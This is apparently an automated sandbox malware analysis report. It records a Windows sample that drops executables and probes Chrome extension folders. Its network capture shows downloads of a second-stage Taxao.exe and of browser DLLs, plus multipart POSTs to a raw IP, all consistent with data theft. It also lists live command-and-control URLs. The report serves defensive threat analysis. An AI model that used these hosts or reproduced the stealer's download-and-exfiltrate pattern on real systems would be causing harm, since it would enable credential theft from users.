Windows Analysis Report AhB0i1fe7I

Machine Learning detection for sample

Source: AhB0i1fe7I.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jajvesg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 27.3.A8D4.exe.bcd7a10.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bdca378.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bcc8a08.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.3.A8D4.exe.bcee218.7.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack

Uses 32bit PE files

Source: AhB0i1fe7I.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.129.81:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.100:443 -> 192.168.2.7:49866 version: TLS 1.2

Source:	Binary string: +9\a3C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb`I source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.27.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.27.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.27.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.27.dr
Source:	Binary string: C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.27.dr

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040F64C FindFirstFileExW,	19_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040F64C FindFirstFileExW,	23_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040F64C FindFirstFileExW,	26_2_0040F64C

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: wedoepicsht.com
Source: C:\Windows\explorer.exe	Domain query: brandyjaggers.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://rapmusic.at/upload/
Source: Malware configuration extractor	URLs: http://100klv.com/upload/
Source: Malware configuration extractor	URLs: http://brandyjaggers.com/upload/
Source: Malware configuration extractor	URLs: http://andbal.com/upload/
Source: Malware configuration extractor	URLs: http://alotofquotes.com/upload/
Source: Malware configuration extractor	URLs: http://szpnc.cn/upload/
Source: Malware configuration extractor	URLs: http://uggeboots.com/upload/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /@lilocc HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-4594-a3f6-6b3bedcc9b58/Taxao.exe?Signature=X6OA%2BfswTdnTnpZhN%2FTguu6wjTI%3D&Expires=1635244566&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=5qays.Q7NMcKdIvyy3pF9kf3XJHnSkKZ&response-content-disposition=attachment%3B%20filename%3D%22Taxao.exe%22 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: POST /936 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 4900Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: bitbucket.orgConnection: Keep-Alive

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:25 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:25 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:26 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:26 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:26 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:26 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:27 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:27 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 